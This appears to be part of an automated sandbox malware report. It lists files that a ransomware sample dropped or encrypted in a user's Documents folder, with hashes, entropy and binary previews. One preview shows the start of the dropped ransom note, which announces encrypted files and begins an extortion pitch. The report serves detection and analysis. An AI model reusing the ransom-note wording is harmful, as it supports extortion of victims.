          Preview: R..}<k...(B_..2......H....me.S.bD/.gy=Qq.I...^n;.....ds*-z&Di...QCN.).9))b.NuU..X.^..=l..$....... .....a..t.WT.<x...z0.....,.fC.Rd...]..K..7[^jM..[;...\...5"..v.s.Q.6:(y`.=I2k.~Z8Jy..P..........8.[5m..5.....Ew.0..S4..qt...^..HN.R..f......0.el..1.>j.. b...i+%../ T.&;.uf.(.-.9..okx.........~...<....2..J........8....E. ..X.....~>b...<.z...s[....n...-_.U.........~......'...M..l..K....5.h`.8\.qS.a...c..*..N'Q.i.y}#..|V...&......`=.0.P.n.............(....+j".;....#t....U...'.\...M..e$..C2..&....??.d..<...)`.j...Y3i..E.M1...8p..hEg.{K.Xs.cy....aP...@.G..^.u./"......1.^S}<n..+..t5&.:'-,......}o...[....nJ.....p..p..A.R.]....-......e(.hx..E..>..sz..4..N.r.VEk.}..P....m.,.7..V.3.3......C..I...o...H..L..r... . ..9..Y.....%....c.)....#9.m.sEK;...&...5.L...3...t......r...s`@M.#D....:v7?.....'.._l..R..`k.0..8K.&..qs?X#.+......R.|...!D...9.....VEBs...&...g..r...~T..y...+...-jY3..-....uS:o...:1..W.R..l..S...cA.+.=.n?bx........-.-rb1..4..$v..:...)..O.....o.&
          C:\Users\user\Documents\VAMYDFPUND\SFPUSAFIOL.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.857037488854644
          Encrypted:false
          SSDEEP:24:QlJOLYEabcFro8l2FaYNFCqLWuc+2jdJhsDaXADn+zlJtV:CJO8EQco8AaYiJC+QGu+JDV
          MD5:72412E43FDCD85F62300F3435EE7671C
          SHA1:45FEABCBDFBCACAD48681FD09B3BD0100372300C
          SHA-256:3A6F26605E7A0D5B2C2D070C3CE73B0E94F19CB99504498B6736DB7EE3D8D0FC
          SHA-512:C915CDFA0B21F0EBB435F77501F67EF33BACC99C5B0779C53A5E0AA05221AE104F2B717B0947BD6A9BB4F302462E362172B7EB6D09AF278C72487579068004D3
          Malicious:false
          Preview: ....i.)...p.._... .2^.+..0..<2...P!.U.OU.?b0,@..?...qD.....b.Z> fk..#5...=.$.P..tYje(@+.....p!F....0K..Q.....5....!.....v...f.....H.r{...|....c..K.Q0Gb%....:...T.....2aH....).9..S.v.[.2......o{.....JV.mN..~.#.!...~..KA......J....-.5.0.,X.$.#..d..J.p.t.l<n.w...8...I....@.....M|.....^\.T^...%Py.....8.%w.G..*.....n....|L.V...H.I..XVL|q.y...q..N.C~..C...h^.....T...XUh..T.).=.5.[q..e.....t.u...3N'p".....1A..um...$..R9.knR<....*.......6...s.0..#:J.~..^@.....v.o..C~-.}|..A...p.....9..$>....q.7.+B......HG..S.PZ`E....7...l.&.....&e..Y....K.kk".G..."5..M..v-..q..m...+...7Tm...Ula.;......y..:B.. ....;..uC....P...R..;.~EO...$.^..u..\s;........V.'H:U/.MZ......t6.e.n.9......G....y.Y..#..U.6U.G.VG......I.[...j2[..;.K...f@....V....i9.P.1...ov.w..l.t......Q..W..|.I...@t.zbp~...m...H...<.].s.70.>.w...M[..#.C...G7..DF.pLc..O....|....r.....q=..0....[.M.c.dF........y....B{.x.[.....2..?;.r.T..[.....J4/4.}*.;....KaH....O.....hl.|...."...BD.......c/.../.
          C:\Users\user\Documents\VAMYDFPUND\SQSJKEBWDT.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.863363416788419
          Encrypted:false
          SSDEEP:24:Tg8QtGJ1pOFDKDkUOdYZkvrOm6M+w1UM4/DsvSJ1y/XADn+z/Uc:TgdtGJ1swOgl/MOVG2gu+7Uc
          MD5:F90D1A242AC1556A7AA7135E34703502
          SHA1:D2CE1B09137E024A0C4B6153218FC5B2D04615DC
          SHA-256:8F0B08EAD2ECD78BBFCA22B5797A52B3AA9446E1C118F138D6740A71A3F71510
          SHA-512:21076C621414ED0D9B91B72A34A52F84B637B840AA32D02134272D03A6A07E6726121C113F5ECD50BB5F06C789C0B3A686731E2D3B9A26C77D95529A220C6E3E
          Malicious:false
          Preview: ...../.M.m.....Q[k.'.D.?.......|J.y%R].rG7.QnD...a...b....=........!|..Z7..{N.E...).30.4g!n?.~q.J...]i...QY*0..........P.....jr.S.T|0.7....e}.i......._.x.]Q9K7..b]... i...S.~&...7..rKO.1.b.......mD...:...I..5[f.x.D" i.w.L.WP...@U.......@..1.GQ.#.{j..v.#`jI.|~ea.vN.ou.0....:...E...&./....i.II.8..G...G.zyNEZZ....i...n.}..........U..M........Bv)^...H...]k..2....CL=.7.?.vI...#I.kc...:....8!^h.%..*.R.v...^t..S.?.A..V.!..I...o.D..O....zn$.8~........2..%(.4...H%v...E;.....[.oI),`.D.S.T...<.....RZ..Y./ ..\,...'.<.`M..j1..|.L........YVj.,H..z..6......8....4...>.R1..4:...)~..x.T.4...s....P...|@~.{.j..:6....H|F..6.C.SI....(}..)p*..O......T5[....b.^.[h.y..D....y.Q......4w.iK?\..*Ch.}Z:.u..Z...2.qi.....>X.....\?/2Sl.\l.M.....F.H..^..Vkv.....O.6....^`......s..T8..8..qw.@..&.2.=.!%K.r....8.9......@.N#._3o...F-.y...8.E(\<..!w!'......Np..q*o..X#=...:.s.#/.\. ...pu.z..c...q....i[.%N...C.d.mu..D:B.N.MIL...-_.$}.....<........../.....(.].s9=...
          C:\Users\user\Documents\VAMYDFPUND\VAMYDFPUND.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.862915461718719
          Encrypted:false
          SSDEEP:24:dFpPLCPMDDFDpD0Kloyns2XfreJyvEcN8qOUeTXADn+zycjRqa:dqPMcKygZXfreJSX3ku+/ga
          MD5:11C92CD137BCE63346822D54E7020FC4
          SHA1:DE42609BA93F232FA0F9901946ABE3882628AB4D
          SHA-256:778BB16527C1BBBB12966EDE68769CC9F26A8BCF74ED27A03DFEB86D9B6309CD
          SHA-512:99E192E57A06973AC727130588929E36B60B5090B0B3DBFF479EE474ED1287A9A2CB72F66B91CEB4B13299F5712FBFE9F5A0B7B9FA70F2AEFF559F91580DF99F
          Malicious:false
          Preview: ....X......ie..Q... .b*{.........%.......O9.;...6QT..ZR.......L.....#...W.MY./.^...L.]..wST..hv....V....V.....j?.jO.X.".h...z.z.4eh..'nyQ../......I..k....'-....)...G.8.2....7...L.-.QT#%...R"...}M)Jh..3.rh..R...>....OA.B.....[%Cb.;"..h...-L..Q~...G.Q.....M.#.....f.W.*... .C....2pS.y..Dd~q...>{.@........11x.A.U.F..k..L.z.......X.;.q..VG.t?...JJ.u...}...y..#...._m`m.%.$......q..V^(|^..K........m...6...........Yb.`....9~:.#t....c....>....n..2.....#.M.....VI.:T..I.b..,.....H.n.!.......7...|..w..Mcd.0...I0..S....By..t....G.'.jl9.@..3...==....^P.+gg.o.?..HV...#.8....~.y.....D.Mc'O..{......LF...!.]g]$........+.z......k..S..@..5..P..[...gq...e.X........4....].j.K@..,8....T...2.<.v.>...K..|....2A...At.d.H.8L.y......X.q?....).@..!.`,.A..6J....m..n..R.(..P....0...y.....8.`....x).},.h;%n..h.6"..pE..."....~|}\c..N.....h....{..=.Ft[N}+..S...1.>v....l.....C...,.0...p.....+.....jfn...e...)b...h...]`\..V!..-2X ....5-...2.Ns..{............fG....xu.....&L.).X^.....E.)
          C:\Users\user\Documents\VAMYDFPUND\ZQIXMVQGAH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.833022869757226
          Encrypted:false
          SSDEEP:24:eXA4WKtONncN79k/4ZRH09IX1Lo0OpHBPEXADn+zk7R:IA4FinY9k/mRHGS1tOhBku+Y1
          MD5:33BC490EE4636380E641079585D9863F
          SHA1:15BFC74BBD456682C0343F9D212692B6F6B46FB7
          SHA-256:D4ED9AB21ED1DDCE8344EBF89AA64AF50B98E96672D4DABA57B83C60E3950192
          SHA-512:4B9436F29EC06808F1C6C2F2E6C60D6D417FBC4DBA37B8191C5898CED4AEA7B6CF5DA33B8FB72D101B3D8851D3860F24B9D3B6143BED4D72C38F42E873C53A35
          Malicious:false
          Preview: .v..%H.|..dp.'D...9.d..2@j.M8?..L.....P...CU..w.zB....NZ.>l.M.....$.5.G....2............Cr..iI..H....@.tUi...^h<.H.....!....&..i..Y@#HN#.|...r.....,Y...@Mb...p.......r.W..]b..j...?+.N...3....)."..G+0R..j9..k.<.....8..8}S'w..j.U..o.(......$..a..Ky..=...Ak...."c.'..e.7#..}j.i ..E..x...)....o?....b..2......ET|.iu-.".....{.9 .Y..V..8..#N....> ..:$...mt.$.h=w....8._.A9<.E....?..Nn@.v.E..&.95..R..a.F!...r.i./I.x..e....(uCE.'.......3.h.7..B@..@.M.*..:.|...P....I.)0.......jD~.%v.G:."3.... M..0....J.E...6i..._#d0..B.....2....x...."..,..d.LLNQ5_2..!..#....{J,7...*7f.%fk...+=..$..0.x..gt....4.-...Q}$....{...%......(e.d....J..`.Yq=...5..c...{.`u.J. WD...)*N.;......b.0.Z.U@`~.s.s%_d.b.G&..C...C.|...],....Q`9.Z?.k..4..Bgp.............Pp..}..Z.j..2..8.....N.h..2...'.b...I.Q..G....#.Ub.........'`t.6...J......".]..>..[...a.....CS.......\..-$.v.C.p0u ..H.....e...P.....O...[4..j.z..........$Q{.y^K1~.Q..R..|...#=K .C.......0.(.:.n...>?.0}J.9..
          C:\Users\user\Documents\VAMYDFPUND\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\WKXEWIOTXI.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841086855452462
          Encrypted:false
          SSDEEP:24:m4gESr+r7UXwsdcf1L0N6hEDSPgq+L5saJtmAwXADn+zj7J3:m4gESr+riDdom6hE4QL5REAIu+zJ3
          MD5:4F0E895E7CD7F027F2A11497CA203F71
          SHA1:AF18019D29C9BE80E27B0B819CF4E67B95269B43
          SHA-256:35946947CA0BBB464413AF4F48A6132EFAFF94E12150A7BC11208341B88AEA76
          SHA-512:506DD497A12F29A49C68C3FC5665128C85B1186706E381878685F486902FA04373DA73362A5DC5408308B9FC11BD4382F504A04FE609A3C47E50E1BF0106BC20
          Malicious:false
          Preview: ..],..A.{V<..D.z..5.l.....JS......%...3.......6.~]@..B.&P.R...VJ...U...3X$.{nO..m.J...aP6...Z5y...........s;&.....{...s..?x6".SF...nfb.|...9....C6.....J..i.......99.K.e..r.k0..>!.a.... ...#./...@.F.h...o.`Py.F6...i.H.pX.....oY.*.6.Fv.....!.?..._......P:.VL....j......p?q...s.d.X&.........y&8*.!\.usXaUdk..)%.J.w...jT..T0....~......J.0...p..N..z.]..;=U..LM...B.vb............g`....VZ8....{.;.......?cr...|.8.X./...t...(.s.}..."_Z.(...#..gV..$J0.4.G.B.;.2|%./...e`..A.1..#.C..0.S?BL.Zw.$c..X..s ........_.@...g.N...i.rI.+l.+Z....8|.V$hAi].=.C...L..o9qo%........=..OE. 5...%.s2u..........T)e..0..].L.{}G.x..hp..,....].w.y..!f..u^..1n....I..8.`.G.~.YX.......G.Y.... .Y.G.dT.C...}.C..@f!BH=..R..K.3.a..r...../.4..T..a`.....9.@.I:k....6'....x.R.....U..J.|...bb}.._%.c`}5c0I.S..5J..A..$ 2O1.^...H..J~L..........y..T5..I.@m.$...s.@*..(.........i.J..A............&"..1....^....Pz..]j1......o.+.Y.U.B..sL....,.d..y.9B.B...o....;...5.*...Z.......;".\.../z.r.
          C:\Users\user\Documents\WKXEWIOTXI.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.851430227081893
          Encrypted:false
          SSDEEP:24:uZkyT0FBT+EoNR5QrA3SBzHxfofPTaG2SvHXADn+zQmQ:u2+gBT+XNQrLTofLu23u+6
          MD5:2C32153F30758B3904D36DE7DF45226B
          SHA1:136A2A31EF9C90491BFCCDED3372EA9E86B117F7
          SHA-256:E563E8A0755C81E381FE906B7C5DA65520B7620C668D8E6FE616519503B634C8
          SHA-512:C87A8BA5142DFDA075F4FADF89488070904ED0B348FBF219FB8DD12852C6C70A11C674F6C1AF804CD7C55CC66360FB023636E6E3B12C4807EB46936D8726B535
          Malicious:false
          Preview: .gQ.M.|..E...k.....R.P..j..`.....~cQt.R.(I......v..#...U.....3,......&..!?3..=^..Q.i..3.4.e.*cd..v.o..k.*..=C..6g.;.........3'n...x..oM.2...`T....U..sH...>..*[.i....L.........e..p.....6.A4.]s4.bi....%..!.....q..8V...=..x..qx....m9.S6......83..a|5..........g.A.........D|...l1B.+24xxV.8V&.._..dlX....D.]...Q.._..x-.9....d.wtq.j].....p. }U.....,G.q^./.{...zH...y..........$.M.k...PRX.i.$..~S..:.;.PS...3.[..*..~-.I..2..R....0.C...J+.Sc.O8V.Y...4....W..[..>..:./K.%......V..:...X.8.db..#.....r..-.e2!.....!....t....q.E.5<K.1.:....(.*...6^.F..\.WqH}f^.a..g......."..#.@l.._.&.D0V...PP...6Equ.f"5&`...(.s..........m.J}...S...U3.5>..:!btS.L+n...XU1.w$..#.^..........w............. .:X...< _..:..hn..h.D.~.Fy..-QWO...x.". ..T....:..[D[.'.a$YI?E.......Z..a'Qh'w.G.G..b.pm......H...}G.jWC_....JDf)aU9....$n..N..d..`..;p..P.=.c...PR#......M......Y.._.hRZ.7.yLp.GO...3>.....WF{.z.a.0..K.J.{.| ..J...KV..J......^C.).B.s.(..DA.G..3.>...+....a.x.B...d.Q#..F.).i^
          C:\Users\user\Documents\WKXEWIOTXI\NEBFQQYWPS.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.86710007370703
          Encrypted:false
          SSDEEP:24:rc9jXmmHZEbpAJOjnWdJTO9R8U6k9jmyoBHozzfYPIFRXKsWvaRPeaXADn+z6:rctfHZEbyJOjqt0iIjCBHAXFpavaJu+W
          MD5:B990AA9C983C5928F972B99662FA208D
          SHA1:9A612C0956F617F6E26457A079E0371B6734961C
          SHA-256:DB0D3DC9100159BE6B846290C2F2155C636DE7F2B6086E461F8959AA23932453
          SHA-512:2AA484306632019F022B59080051ED98D05B6CE5A2038323875CA62FABC0548CB2431803B749EA0837BBC99B6C5D5ABDDB8E2070D214199C4BE08A197F7EA82C
          Malicious:false
          Preview: ..^.D.wAm...k...*.8fxO'.t.=M...@...1$.`..../..iVy......`..m.....1.S+~@...a...U.... .u;..yI..,.s.....9...3.....l.E.9.H....h9..'p#c.7..l<.T..@3.Nx.`.X..2rpPR....s..u.2am...$....RZ...#.8rq.....m..|.m..SCC(...3.....R!#/%.t..F.+O......iC.5.0ZJ.C...!C.Q.Srmm2.o..-j*.....t...}..D....p..Nv...JN....[..s.E..p.....+.m#.k.@..}<.....*(h.]...}...x.c/..0.iKo..L..;R(.(n.......B.......g.V..I.F ...;....B?..K.L."'.dVN.......MT....X..=..n.FKq..._Z..'....J.a.._B...#.8......D#.g.M..,...^.b..[,..C.@.4.3.2....N......./.+i.r.1.)<..!.zD....m.G ..}i..Iw.-........5..;.....P.j...R.C...8..b.Qmf..h.e..$...V]9D..W..G.......2%.(..B..:8.&.(z(..?..3;p2....*6....."xWm..8..kW......?.[6.gD=E6.Y{o.t.............>....B.J...B....z...<.-`r.D....8......B.~.~.*.A....[x..Ae..7.B.J.....l...Xv.6d4V{...r....w......v....:.;..-J..>.S.~I..54y]..F......n.e.S....h.{L....4.z.1....w..q.B.q...lb7^...z:.}O..G..Tu...H).....5W.^.5.e.A}.-..t...k..?`.:.....D.....>....i.....(\sF..*... ....!
          C:\Users\user\Documents\WKXEWIOTXI\SFPUSAFIOL.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.825084333626184
          Encrypted:false
          SSDEEP:24:xPM4sxwMWX8wj372kD0ZER+IKKKgGkNNsXADn+zaZ+m:xQxwMoHPKgGkNWu+W+m
          MD5:7F4EB4F5B83A91D670C13C884BCAEA52
          SHA1:AF5BE6750947E1508525B82B823089B8D4B42909
          SHA-256:AD8D20BADA4EAA54965D68C62E59FDACEA7813BAD2024E0C29ED0C43E5ADA5CE
          SHA-512:74B4D41674219975E990A1AF2A6FCAD915EF6C619A8D11613A10A9B659BE7E8DFFFCBB1EB82D08686AC810611CCD256079D834B3AD40764B7E62835BF9C56943
          Malicious:false
          Preview: .'..H..}....`.^.7=.@(.@...@Q...y.e..go....\.X..Tc..x.S..cY.....jb.........b.|.2.6;.>8P.p.HF.....M.V.....C./.H.v._.|.}.cEG.v..dB<..0.9...T.p.........5I..f.). ..W....#.....L..m.m.'.B.$..@.xsV<.T:.....6&$^....CK5.....Vc`w...v.k...l..=&...0..ThAJ...M.....O4.s..-.......%.c+!..mwl.\...[fb.Y.3.7|..%D%.-`.4...l....h........+....?_..k..l......$......p\..R}(j...B....-*%.^%..!.I.h.b\*./.ly.....!........o..e).........d..6..`\.k.$.o...&..[......|...6.ZC5S.-....m1d.K.!..E.....E..>%.k...+...N.3..rz..X5.k..do..z...9..xL*De...J....,..;d\P.3.R...!.._|.xke1.s.:.......l..g..T."O....@v"T.D..K(g.4Xx...W.f....N".....*..1_..v..m\U...=A..U.....>.L.B.8........DR(x....#.@_u.:Bl-..(...EW0..z....>-.%....S.D...x.Jk.;...N...."......K.Zsj...*..(S.:+w...7..x.n......[...R...).?..Z...-.Z....2...tD..*C.tS..T.soZ..._...C..p..,4:...@......s4<.6.u..[C......K..J.z..g........3~.>I.......{.+!...=...CZ..w?v99|j).....o.n..9....S.........n.....[...F..>......C.._]..p...1U.|..c..
          C:\Users\user\Documents\WKXEWIOTXI\UOOJJOZIRH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.825774738380948
          Encrypted:false
          SSDEEP:24:ydhnAtNKq92woYQvU/lZl1cyaJhrLhs26pr35Mc+vxeDyEpFpxE2jmXADn+zH4I:yPq8CQ2bcyk9Lh7sracY4xfuu+L4I
          MD5:B88DE6A38D0AF86969558DC8168612D7
          SHA1:88F5F152C8B813860027F85C397006F1E00D85D1
          SHA-256:961C05C489943619A4380E6F867B74FB58F8C0BCBC0339BF608E9917DF67E4C2
          SHA-512:C18DE3BB339E7608FC979960B0281E189B5CF1F49A6427ED5C57394186552B8029098D28368862481313F2AEA49AE36577332E1E97845481689A3A01A8800580
          Malicious:false
          Preview: ..*...U..1w.<.j....L/.......%.'...9..._|............v:.b9}..O...8V.&...!<~...\....X.z>))......~G....--... K=.bXAEH8.........~B...?A.Yq.Lm.*..$@./.f...4... $...8..Vx}....2.3.^..!........Mn..E[.T.BE..8}..4..Q7..my..d.Hq.\z.........v..a0.b.o...b*k..........}...!....R:.....0...K......JjC%....m.C......`..nb...2...&C=..Q...+..7|...L......e..I.....x...H|j....O......j......|.T[_.8..Q...8E.....(]...4|./..)...O.1=z..i;............=.`?. 78.....j....O.'.z..b..U....{...K.G.K$W.?.+u0o.0=....Q..vg.5`.[..$..=.2....|zH...g.9..D..p.Q..e.la.<.....l..?...Z.q..T.P.3.U.Y..!...........o@..@...../u......c.Q....w}5.%.......-6........*M.~ru.vH.@.B...[./....x.......ey..v9..6.SA."F..1.2...g./I.].s...Vvh..96.....J.....q.......r.u...a..HGr:..........E..%s.8..\Y.............b0.(d.p..<....M..i&...X....c.VS..2.1...4.M..+/.3.[.E.c!d.EP..$S:.......&VC....5.Q.m:... .p...\=.4.......2!Y.{..b\.....9.'....R.-]1....69\j @..k.Ff....;....Z8.......i.s.. .7K W" ...4..z.....|U..%.. vP..
          C:\Users\user\Documents\WKXEWIOTXI\VAMYDFPUND.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8364108509355335
          Encrypted:false
          SSDEEP:24:wU8w4pjJymL7uvYl+vETkPPdDwtklTIA1BGVXbyrXADn+zN6FE:wU8vpjwmL711TIZ1OXWDu+d
          MD5:55BB60D4252B1335E739DA6044D93D37
          SHA1:A55C26B231153BF811188131F40E0CCDE69AE17F
          SHA-256:E50D1F2BBF879E957668B76E6ABC0B775C6235D85EA3F18F4C08EF69C0BEEFD2
          SHA-512:128B236EA1206ABF1D028315BE9F8BF431044B5CEC1CCC8B61437DCE55CCD1CE19FC2D9493E2F670EF22974DE11614337B5284006E94A4EA68027DBD1BB15A57
          Malicious:false
          Preview: ..;...Xy'..u...]..w....Ea..7.-&...K#.,S.l.Y....j.,.....0|b.*...=D.......o..h..a?..(U.RL.G....^.....2E.mY?P?[].3...|..}.E:.Z.P~ .s*;.U.$.R.ig.....',.yh........kQO...j-O.f.Ju...<0.T?.R...!y..mO3._`..9BCgt.....f:q...l..by...}>........n..r`1_*....[..^..E../...=..q...0.... ..KgZ...Ij...E.j.........<..]$A......EI......9..TX.n.x8am..O....%..b...7.......i..[&....A6P..{.]..&.G-..:......mW..u....X7..P.............o.9.od....\c.,....G..$2&-.....q....Z.K.....]...|.........OP.9 .."O....m!...J^3I"kp%.G.F.8#...k...iD....X...e!..={.<..#.".."...x....@.s.4i.b...i...=....Zz...h.....S....Q..!qWg^......3...,sB...o...3?..m....g/..E./.....~.2..i..j...&i.:}.IW....T..!....)DwCTW....E..L..2.........-...\.a>]...^6]....Y4..4L....5.............c..+,.........81%}H...SE.........Y..M..s.q.s,[..v.......\..Ok.b.....c.n.>K~.T.D9.k..<......L..K=....N/.]...:......<.2..N..Z=,`.X.Ef'...*..B.!.W..%b._k..........$..(.oji...C.L}i.B...I.6...w(..L.6..4a...a..0..M.uK-...H......1.....
          C:\Users\user\Documents\WKXEWIOTXI\WKXEWIOTXI.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841301911364422
          Encrypted:false
          SSDEEP:24:t3pxrAU/iROfRVkn73gSpxRvhXKYcZ3n2DPpXADn+zJN:hriRSgQSXdh63Zn4u+L
          MD5:12A194563C4E2CC381659D1E5F389705
          SHA1:5C02B7C518AC5839FFA9E756C50B1D28597820FE
          SHA-256:BC704C37292C8CE5AB4D64D495D15A45FA5D4356C67C8160D26DCE28A2CE5E7A
          SHA-512:EFDF404E1101ACC642792D3733D9E0314A170C060F59B728858C9BF62958FB687AA180E556AF5779B973E48E215B83E443FCE39904176BA6F6666CADCF6D404B
          Malicious:false
          Preview: ...~..Og....P...W.l...X.J.P..A.."....=.$.f/y.h...y.....[8.b.Z....^.p.T9.m\.......b..MA..5X....}h....3...(.oe..u.}G.._.e.q...4..........8......,zQo..'.|r.....^........I.e.W...M[:RG.wt..S.%9...fp....R./...E.#...I..... ........U.....).h.d...H.......mh......#*.q...w9.pjO...%q.)...t.%f."r...T.&~(.v.6z.2...?....[L.C .. .Y#?.O|X...{.'`..B..%....^.lB.m...q.R.nKF@&.2&..X>n.o..Ef.`...HD../..O......l.j..$;..0...r.5V...X...9xCV.e.S.'.KQ{1.h:n.r.E..~l.K..idY..R...0{e.'.+G..I.....y........^..p.?.(...i.XY.....Y....7..;........."ZK...).*.K>..u.H?m../.._x...\...X.C....Wp`MD\.Zc...."@~...Y...^z....Q.1.I?.v.P.A..!...WM..I.....+..~/.../=.......5H.}qA.m.|....w..o;........4........n4.-.b.!...L..-zR..)V....f6..h.....|,..'u|...xi.....p..S. k.^......R.%...d.H.T1Z.n..f..v.~..%]M1.v.9f.8.4..r....M....Z..ev<..!.D..T...H;.......Y.9S.-..x..U-T;'..r...~..."..+...W&..M..i.*.-oQy..z*v.... >..-........~-.Hf.b..........Qm.].>..DTg.0...l..B..lLk..?........V.....V.}o..'|..d.,.U.DoZ.m..
          C:\Users\user\Documents\WKXEWIOTXI\ZQIXMVQGAH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.838716703928943
          Encrypted:false
          SSDEEP:24:TcIbz9ZgBLCmc9Pg6hX50wLVUYKjjH+18OJkuXADn+zYvG:DEi/X50wLJ19nu+UvG
          MD5:E2EEF6984AF40939C8F9F644042CD8C1
          SHA1:9040144C7EBF06B1CC9C022867FBBAAE8AEBBAB6
          SHA-256:BB74173A6AC7CF492E03F02C56E7B8F98C2E04A70E4F39D1D5689E0F465A9211
          SHA-512:0F0F8E75DA18DFD75F978D3F65AA95CEB1182D171BB131BD761BBA87E306C54C8E8F8F5953F5778B99E2A3068E4CDB9F21CEA35B4F5CEDE529AE39A23263FD3C
          Malicious:false
          Preview: ..qnWZ+c..K..pe....z.G$....3..Q....h).L.5....x...wu@.m../...'b./......l*t.D...$T.t..#....9..<v..n.[.XA..M.....g...8...J0...u.8.ag...=..xu...x).....[...Y....R..Z.a..}.g...{.U..J.;....[A)Z3..A+y.+..-..p.Q.{+H....y.^..G.R..}.......g..t.....A.#.rwpu..3N........f....~9df..|...k..............(WD..S..4....U\..C.36..JhR..J....{..{.<Zf..u@..'~...%..@.m.m'G../.!..To.F.Q.VN...c...n"m.?...Bm$NL.'....N.E.<k.>...w... .I...g`..m*F...4...Rl.........-.........." ..]...X.p.m..c=B.Y..sp..^bl_...T<u**..eG..|.D3....1.e]E....c...b!L..,...s.t.3..8.).;.*......PB....D[..........|S.:..%.C..hF.B.T....s."5.G.I.....V@ $.u=.J.jJj... .q..w..X.W......V...7.3....Pb7y..)..V..:.:..k. y.....u\...Y........I.@.u.'U:.. U....'..e..m.O9.`J.b4G..}"].........Djc..xh..W{.V.f....XP.......8...w,.m....L...yF.\.#.0o.Y0.=.[C..o.$'.c..C4=..P......ebC.R.p.......&..Y:3.D...C%...&...i....G..b.N.Yc..L.`_.._..f.....OP.j.>...b.%.R..U....A.h../.c......PP...,.b.)R........L+.f.f.l;.GyXa...#...<.8uT.b4r..uiZ@RF
          C:\Users\user\Documents\WKXEWIOTXI\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
